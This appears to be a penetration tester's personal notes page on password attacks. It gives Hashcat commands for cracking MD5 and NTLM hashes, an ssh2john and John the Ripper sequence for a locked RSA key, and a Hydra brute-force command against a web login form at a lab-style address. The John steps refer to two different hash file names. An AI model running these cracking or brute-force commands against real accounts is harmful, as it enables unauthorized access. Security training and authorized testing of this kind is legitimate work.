Password Attacks
This page is were I'll store all of my password attacking commands and tips. For local hash cracking I'll usually default to Hashcat. Hashcat is going to work best when running on your host machine rather than inside of a VM, especially if your host machine has a video card installed. When utilizing a graphics card Hashcat can be much faster than john the ripper, but there are still some cases where we'll use the tools provided by john.

Wordlists

  • ​seclists​
  • apt install wordlists
    • /usr/share/wordlists/rockyou.txt.gz

Hash Cracking

Unix MD5 Hashes:

1
echo '$1$cVbu7POZ$WB/V36i/G00QKzHkkqWig/' > hashes.txt
2
.\hashcat64.exe -o cracked.txt -m 500 .\hashes.txt .\rockyou.txt
3
cat cracked.txt
Copied!

Windows NTLM Hashes:

1
echo C5E0002FDE3F5EB2CF5730FFEE58EBCC > hashes.txt
2
.\hashcat64.exe -o cracked.txt -m 1000 .\hashes.txt .\rockyou.txt
3
cat cracked.txt
Copied!

Password Locked Private RSA Key:

This is going to be one of the few times where we use john.
1
python /usr/share/john/ssh2john.py locked_key.pem > locked_key.hash
2
john --wordlist=/usr/share/wordlists/rockyou.txt joanna.hash
Copied!

Web Applications

HTTP Post Form:

1
hydra -P /usr/share/wordlists/nmap.lst -l admin 10.10.10.10 http-post-form "/path/to/login/admin.php:username=^USER^&password=^PASS^:Incorrect"
Copied!